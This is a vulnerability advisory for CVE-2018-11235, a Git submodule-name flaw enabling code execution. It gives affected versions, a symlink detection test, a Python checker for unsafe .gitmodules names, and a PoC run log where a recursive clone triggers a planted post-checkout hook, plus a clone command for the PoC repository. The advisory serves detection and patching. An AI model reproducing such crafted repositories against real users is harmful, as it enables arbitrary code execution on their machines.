- Vulnerability name: Git security vulnerability
- CNNVD ID: CNNVD-201805-1020
- Severity: High
- CVE ID: CVE-2018-11235
- Vulnerability type: Security feature issue
- Published: 2018-05-31
- Threat type: Remote
- Updated: 2019-04-01
- Vendor: git-scm
- Vulnerability source:
- Description: Git is a free, open-source distributed version control system developed by American software developer Linus Torvalds. Git contains a security vulnerability: when a submodule name is used to create a directory under $GIT_DIR/modules, the program does not properly validate submodule names taken from an untrusted .gitmodules file. A remote attacker can exploit this with a crafted .gitmodules file to execute arbitrary code. Affected versions: Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1.
- Affected versions (source: "Git Arbitrary Code Execution Vulnerability Detection and Fix (CVE-2018-11235)", 《Git任意代码执行漏洞检测与修复(CVE-2018-11235)》):
  - 2.13.x: versions below 2.13.7 are vulnerable
  - 2.14.x: versions below 2.14.4 are vulnerable
  - 2.15.x: versions below 2.15.2 are vulnerable
  - 2.16.x: versions below 2.16.4 are vulnerable
  - 2.17.x: versions below 2.17.1 are vulnerable
- Detection test (a fixed Git refuses to add .gitmodules to the index as a symlink; mode 120000 with the empty blob is exactly that):

```shell
mkdir tmp && cd tmp
git init test && cd test && git update-index --add --cacheinfo 120000,e69de29bb2d1d6434b8b29ae775ad8c2e48c5391,.gitmodules
```
- If the output is only

```
Initialized empty Git repository in /tmp/test/.git/
```

  the vulnerability is present.
- If instead it prints the following lines, the version is not affected:

```
Initialized empty Git repository in /tmp/test/.git/
error: Invalid path '.gitmodules'
fatal: git update-index: --cacheinfo cannot add .gitmodules
```
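As an added check that is not part of the original page: the version table above as a function, plus a scan of a .gitmodules file for submodule names that a fixed Git refuses (an empty name or any `..` path component, the rule that stops a name from escaping $GIT_DIR/modules/). The sample .gitmodules content is constructed; its second entry is shaped like the `../../modules/payload` name visible in the clone output further down.

```python
import re

# First fixed version per series, from the page's table; the page also
# states that everything before 2.13.7 is affected.
FIXED_IN = {(2, 13): (2, 13, 7), (2, 14): (2, 14, 4), (2, 15): (2, 15, 2),
            (2, 16): (2, 16, 4), (2, 17): (2, 17, 1)}

def is_vulnerable_version(text):
    """Accepts 'git version 2.16.3' or '2.16.3'; True if the page lists it."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no x.y.z version in %r" % text)
    v = tuple(int(x) for x in m.groups())
    fixed = FIXED_IN.get(v[:2])
    return v < (2, 13, 7) or (fixed is not None and v < fixed)

def unsafe_submodule_name(name):
    """Rule the fix enforces: reject an empty name or any '..' path component
    ('/' or '\\'), since the name becomes a directory under $GIT_DIR/modules/."""
    return not name or any(p == ".." for p in re.split(r"[/\\]", name))

def parse_gitmodules(text):
    """Minimal .gitmodules parser: {submodule name: {key: value}}."""
    modules, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        m = re.match(r'\[submodule\s+"(.*)"\]$', line)
        if m:
            current = m.group(1)
            modules.setdefault(current, {})
        elif current is not None and "=" in line:
            k, v = line.split("=", 1)
            modules[current][k.strip()] = v.strip()
    return modules

def find_unsafe_submodules(text):
    """Submodule names in a .gitmodules file that a fixed Git would refuse."""
    return sorted(n for n in parse_gitmodules(text) if unsafe_submodule_name(n))

# Constructed sample: one benign entry plus a name shaped like the one in the
# clone output on this page ('../../modules/payload').
SAMPLE_GITMODULES = """\
[submodule "Submodule"]
\tpath = Submodule
[submodule "../../modules/payload"]
\tpath = payload
"""
```

Run `find_unsafe_submodules` over a repository's .gitmodules before a recursive clone on a Git older than the fixed versions; any name it returns is one the fixed Git would reject.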
- Running the PoC (the build script first, then a recursive clone of the repository it produced):

```
[anonymking@localhost test]$ ./build.sh
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule/.git/
[master (root-commit) 9bb1fad] submodule
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/payload'...
done.
Cloning into '/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/Submodule'...
done.
[master (root-commit) fcbf40f] CVE-2018-11235
29 files changed, 560 insertions(+)
create mode 100644 .gitmodules
create mode 160000 Submodule
create mode 100644 modules/1/2/3/4/payload/HEAD
create mode 100644 modules/1/2/3/4/payload/config
create mode 100644 modules/1/2/3/4/payload/description
create mode 100755 modules/1/2/3/4/payload/hooks/applypatch-msg.sample
create mode 100755 modules/1/2/3/4/payload/hooks/commit-msg.sample
create mode 100755 modules/1/2/3/4/payload/hooks/post-checkout
create mode 100755 modules/1/2/3/4/payload/hooks/post-update.sample
create mode 100755 modules/1/2/3/4/payload/hooks/pre-applypatch.sample
create mode 100755 modules/1/2/3/4/payload/hooks/pre-commit.sample
create mode 100755 modules/1/2/3/4/payload/hooks/pre-push.sample
create mode 100755 modules/1/2/3/4/payload/hooks/pre-rebase.sample
create mode 100755 modules/1/2/3/4/payload/hooks/pre-receive.sample
create mode 100755 modules/1/2/3/4/payload/hooks/prepare-commit-msg.sample
create mode 100755 modules/1/2/3/4/payload/hooks/update.sample
create mode 100644 modules/1/2/3/4/payload/index
create mode 100644 modules/1/2/3/4/payload/info/exclude
create mode 100644 modules/1/2/3/4/payload/logs/HEAD
create mode 100644 modules/1/2/3/4/payload/logs/refs/heads/master
create mode 100644 modules/1/2/3/4/payload/logs/refs/remotes/origin/HEAD
create mode 100644 modules/1/2/3/4/payload/objects/0e/6d9b98b3face913a8ebf48f804d6c8fffba674
create mode 100644 modules/1/2/3/4/payload/objects/9b/b1fad6c6e16340496f2cc0fec46c8159bfc693
create mode 100644 modules/1/2/3/4/payload/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391
create mode 100644 modules/1/2/3/4/payload/packed-refs
create mode 100644 modules/1/2/3/4/payload/refs/heads/master
create mode 100644 modules/1/2/3/4/payload/refs/remotes/origin/HEAD
create mode 120000 modules/payload
create mode 160000 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC" des_dir
[anonymking@localhost test]$
[anonymking@localhost test]$
[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC" test
Cloning into 'test'...
done.
Submodule 'Submodule' (/home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule) registered for path 'Submodule'
Submodule '../../modules/payload' (/home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule) registered for path 'payload'
Cloning into '/home/anonymking/Desktop/test/test/Submodule'...
done.
Submodule path 'Submodule': checked out '9bb1fad6c6e16340496f2cc0fec46c8159bfc693'
*********************************************
_ooOoo_
o8888888o
88" . "88
(| -_- |)
O\ = /O
____/`---'\____
.' \\| |// `.
/ \\||| : |||// \
/ _||||| -:- |||||- \
| | \\\ - /// | |
| \_| ''\---/'' | |
\ .-\__ `-` ___/-. /
___`. .' /--.--\ `. . __
."" '< `.___\_<|>_/___.' >'"".
| | : `- \`.;`\ _ /`;.`/ - ` : | |
\ \ `-. \_ __\ /__ _/ .-` / /
======`-.____`-.___\_____/___.-`____.-'======
`=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Submodule path 'payload': checked out '9bb1fad6c6e16340496f2cc0fec46c8159bfc693'
```
- The malicious code I built into the payload just prints a Buddha, so seeing the Buddha means the test succeeded.
- References:
  - http://lkml.iu.edu/hypermail/linux/kernel/1805.3/05909.html
  - https://www.anquanke.com/post/id/146909
  - https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/
  - https://xz.aliyun.com/t/2371
  - https://github.com/CHYbeta/CVE-2018-11235-DEMO
  - https://atorralba.github.io/CVE-2018-11235/
  - https://github.com/Rogdham/CVE-2018-11235
- The author's PoC repository used in the run above:

```shell
git clone --recursive https://git.dev.tencent.com/anonymking/CVE-2018-11235.git test
```